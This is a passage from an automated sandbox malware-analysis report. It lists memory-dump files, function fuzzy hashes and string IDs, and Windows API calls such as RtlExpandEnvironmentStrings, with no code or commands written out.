                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID: /$BVLm$_^]\$_^]\$_^]\$_^]\$_^]\
                                                                                                                                                                                                                              • API String ID: 2994545307-2892575238
                                                                                                                                                                                                                              • Opcode ID: a9bc3b01de3b88ffabd59dd64b1934217659e822f354e217542b11a8252ad124
                                                                                                                                                                                                                              • Instruction ID: 7db30d149b509abccfe81b0e1b2238dd7f2e0c959162acbea6a06416cdc94908
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9bc3b01de3b88ffabd59dd64b1934217659e822f354e217542b11a8252ad124
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0328BB1A093808FD7298B39C89177BB7D2FBD6324F29496CD1D6872D5DB3988038B51
                                                                                                                                                                                                                              Function 00FDAB40 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
                                                                                                                                                                                                                              • API String ID: 0-2666672646
                                                                                                                                                                                                                              • Opcode ID: 7c7407ead60924dbccd45e270053841f0d8353812eca7a9485970d0b649b61d9
                                                                                                                                                                                                                              • Instruction ID: 974bf8195297c26191ae650d6d59c6fcafaf2ae6805156aee65ea62aa9bb3b26
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c7407ead60924dbccd45e270053841f0d8353812eca7a9485970d0b649b61d9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE15876B4C3508BC324CF6988443AFBBE29FC1314F1D892EE8E59B345DA75C9099786
                                                                                                                                                                                                                              Function 00FF81CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00FF84BD
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00FF85B4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: LF7Y$_^]\
                                                                                                                                                                                                                              • API String ID: 237503144-3688711800
                                                                                                                                                                                                                              • Opcode ID: bd3ddfc64087b6bdc86ab4b3f9aa0acbd105ed2aeaa6e5f203fbfb7b89b6b893
                                                                                                                                                                                                                              • Instruction ID: 358c93c19b6fe5bddccc938b84a192ac3f147b57a3e29e18c12a560789e91ad9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd3ddfc64087b6bdc86ab4b3f9aa0acbd105ed2aeaa6e5f203fbfb7b89b6b893
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E022E172908341CFD7249F28D88072ABBE2FFC9310F194A6CE6D5573A5D7399901DB92
                                                                                                                                                                                                                              Function 00FF83D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00FF84BD
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00FF85B4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: LF7Y$_^]\
                                                                                                                                                                                                                              • API String ID: 237503144-3688711800
                                                                                                                                                                                                                              • Opcode ID: b8636bd2618968d06b22a52f3141b1a65ef38d021008457d9e48dd01ad659937
                                                                                                                                                                                                                              • Instruction ID: 31ef2021c77d648700f5ee93d844b240e99d2a5970392d47c3ed6ff7013db845
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8636bd2618968d06b22a52f3141b1a65ef38d021008457d9e48dd01ad659937
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2612D072908381CFD7249F28D88072ABBE1BFC9310F194A6CE6D9572A1D7399901DB92
                                                                                                                                                                                                                              Function 0100CDF0 Relevance: 6.9, Strings: 5, Instructions: 697COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
